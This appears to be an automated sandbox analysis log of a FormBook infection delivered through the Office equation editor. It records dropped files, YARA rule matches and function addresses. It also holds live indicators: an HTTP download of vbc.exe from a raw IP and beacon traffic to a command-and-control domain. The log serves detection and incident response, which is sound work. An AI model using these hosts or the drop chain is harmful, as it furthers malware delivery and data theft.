          Source: explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAC3DEF.emf
          Source: unknown | DNS traffic detected: queries for: www.metafirstclass.com
          Source: global traffic | HTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 202.55.132.154 Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1 Host: www.metafirstclass.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0008A2A9
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F5928
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F5918
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F5B78
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F63E7
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_002F17B0
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0008A035
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0008A2A9
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041E015
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00401030
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041D931
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041DAC3
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041E4F6
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041E498
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00402D87
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00402D90
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041D5B6
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00409E60
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0041EF56
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00402FB0
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ADE0C6
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ADE2E9
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B863BF
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B063DB
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AE2305
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B2A37B
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B6443E
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B605E3
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AFC5F0
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B26540
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AE4680
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AEE6C1
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B2A634
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B82622
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AEC7BC
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B0286D
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AEC85C
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AE29B2
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B8098E
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B749F5
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AF69FE
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B8CBA4
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B66BCB
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B82C9C
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B6AC5E
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B10D3B
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AECD5B
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B12E2F
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AFEE4C
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B7CFB1
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B52FDC
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AF0F3F
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B0D005
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B5D06D
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AE3040
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AF905A
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B6D13F
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B81238
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ADF3CF
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AE7353
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AF1489
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B15485
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B1D47D
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B835DA
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00AE351F
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B6579A
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B157C3
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B7771D
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B7F8EE
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B5F8C4
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B65955
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B6394B
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B93A83
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B6DBDA
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00ADFBD7
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B07B00
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B7FDDD
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B6BF14
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00B0DF7C
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036A036
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00361082
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00368912
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036B232
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00365B32
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00365B30
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_00362D02
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0036E5CD
          Source: C:\Users\Public\vbc.exe | Code function: 9_2_0008A035
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02641238
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0259E2E9
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025A7353
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025EA37B
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025A2305
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025C63DB
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0259F3CF
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025B905A
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025A3040
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_025CD005
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0259E0C6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_02642622
